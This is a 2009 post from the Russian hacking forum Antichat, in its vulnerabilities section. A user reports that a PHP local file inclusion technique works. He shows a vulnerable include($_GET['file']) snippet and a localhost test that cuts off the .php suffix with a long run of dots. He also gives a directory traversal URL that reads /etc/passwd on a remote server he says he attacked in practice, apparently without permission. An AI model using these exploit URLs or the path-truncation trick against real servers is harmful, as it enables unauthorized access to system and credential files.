ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #13  
Старый 02.03.2009, 04:26
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Блин, сегодня на практике применил эту статью , а так бы забил на тот серв с инклюдом и magic quotes on.

Все работает.

на локалхосте тестировал - Win XP, PHP 5.2.4 и апач 2 (денвер 3)

PHP код:
<?php   include($_GET['file'].'.php');   ?>
http://localhost/testinc.php?file=favicon.ico[225 точек ] работает.

а потом на удаленном серваке (Линукс, точная версия и ПО неизвестно мне)

http://www.site/~papka1/papka2/Papka3/papka4/script.phtml?page=../../../../../../../../etc/passwd[4015 точек минимальное значение] работает.

Респект вам всем)
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ